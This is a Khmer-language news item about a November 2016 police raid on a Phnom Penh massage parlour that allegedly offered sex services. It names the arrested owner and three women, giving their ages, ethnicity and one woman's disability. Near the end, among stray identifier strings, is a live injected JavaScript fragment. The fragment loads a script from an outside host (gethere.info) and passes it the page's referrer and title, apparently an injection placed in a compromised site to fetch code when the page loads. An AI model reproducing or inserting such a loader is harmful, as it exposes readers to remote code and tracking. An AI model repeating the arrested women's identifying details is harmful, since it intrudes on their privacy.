ព្រឹតិ្តការណ៍ថ្មីៗ

(video)ថៅកែស្រីម្នាក់និងនារីម៉ាស្សាកោសជប់៣នាក់ត្រូវកម្លាំងការិយាល័យប្រឆាំងការជួញដូរមនុស្សនិងការពារអនិតិជនចុះបង្ក្រាបឃាត់ខ្លួនជាក់ស្តែង

2 ឆ្នាំ មុន 10 tnn_admin

ភ្នំពេញ៖ កម្លាំងការិយាល័យប្រឆាំងការជួញដូរមនុស្ស និងការពារអនិតិជននៃស្នងការដ្ឋាននគរបាលរាជធានីភ្នំពេញ ដឹកនាំដោយលោកវរសេនីយ៍ទោ ផាត់ ផល្លា នាយរងការិយាល័យ ប្រឆាំងការជួញដូរមនុស្សនិងការពារអនិតិជន ដោយមានការសម្របសំរួលពីលោកហោ លីណា ព្រះរាជអាជ្ញារងអមសាលាដំបូងរាជធានីភ្នំពេញ បានធ្វើការចុះបង្ក្រាបទីតាំងបម្រើផ្លូវភេទមួយកន្លែង ជ្រកក្រោមស្លាកយីហោ ៩៩កោសជប់ម៉ាស្សា នៅចំណុចផ្ទះលេខ៤១៩ តាមផ្លូវជាតិលេខ៥ ភូមិឃ្លាំងសាំង សង្កាត់ឬស្សីកែវ ខណ្ឌឬស្សីកែវ កាលពីវេលាម៉ោង៥និង១៥នាទីល្ងាចថ្ងៃទី៣ ខែវិច្ឆិកា ឆ្នាំ២០១៦នេះ ។

លោកវរសេនីយ៍ទោ ផាត់ ផល្លា នាយរងការិយាល័យ បានអោយបណ្តាញព័ត៌មានធីអិនអិនយើងដឹងថា នៅក្នុងប្រតិបត្តការបង្ក្រាបនេះ កម្លាំងសមត្ថកិច្ចលោកបានធ្វើការឃាត់ខ្លួនមនុស្សចំនួន៤នាក់ ដែលមានថៅកែស្រីម្នាក់និងនារីម៉ាស្សា៣នាក់ (នារីម៉ាស្សាម្នាក់ពិការជើងម្ខាង) ដោយដកហូតទាំងស្រោមអានាម័យប្រើហើយ និងមិនទាន់ប្រើមួយចំនួនផងដែរ។

នាយរងការិយាល័យប្រឆាំងការជួញដូរមនុស្ស និងការពារអនិតិជនរូបនេះបានបន្តអោយដឹងថា ថៅកែស្រីហាងម៉ាស្សាកោសជប់និងបំរើសេវាផ្លូវភេទរូបនោះមានឈ្មោះអេង សុផៃ  ភេទស្រី អាយុ៤១ឆ្នាំ មកជួល និងស្នាក់នៅទីតាំងខាងលើ ។ចំនែកនារីម៉ាស្សាកោសជប់និងបំរើសេវាផ្លូវភេទ៣នាក់ ទី១ឈ្មោះផុន វីន ភេទស្រី អាយុ២៩ឆ្នាំ ជនជាតិខ្មែរ ទី២ឈ្មោះវិនធី សៀកង៉ា ភេទស្រី អាយុ៣២ឆ្នាំ ជនជាតិកម្ពុជាក្រោម និងទី៣ឈ្មោះតឿ ស្រីមុំ ២៣ឆ្នាំ ជនជាតិខ្មែរ(ពិការជើង) ទាំង៣នាក់ស្នាក់នៅក្នុងទីតាំងម៉ាស្សាកោសជប់ខាងលើ។

ក្រោយប្រតិបត្តិការបង្ក្រាប ថៅកែ និងនារីហាងម៉ាស្សាកោសជប់ បំរើសេវាផ្លូវភេទទាំងនោះត្រូវបានបញ្ជូនមកកាន់ការិយាល័យប្រឆាំងការជួញដូរមនុស្ស និងការពារអនិតិជននៃស្នងការដ្ឋាននគរបាលរាជធានីភ្នំពេញ ដើម្បីកសាងសំណុំរឿងចាត់ការបន្តទៅតាមផ្លូវច្បាប់ ។

6d384dd2-ac7c-4ff7-81f1-398db1e287a4   922fdcb7-5419-4a53-889d-c6472aa88c86752e2b5a-202f-46f6-96bc-83e818f299e6e0a95ed5-3ef3-4770-a49d-27ecd5d35de9
67302201-607a-4058-b337-d0b03c8da265a7ae41b1-e159-42b4-b08e-bfffb3878001 ec0f5eae-4880-42fc-b166-c9a17864bd123e2eb5b0-c531-4505-a8b7-3e4b5b75ea7c86ccefda-59c7-4396-8d47-238a9d8987fd496b943b-09c7-4fa2-a1a9-fa980bbebd91s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

error: Content is protected !!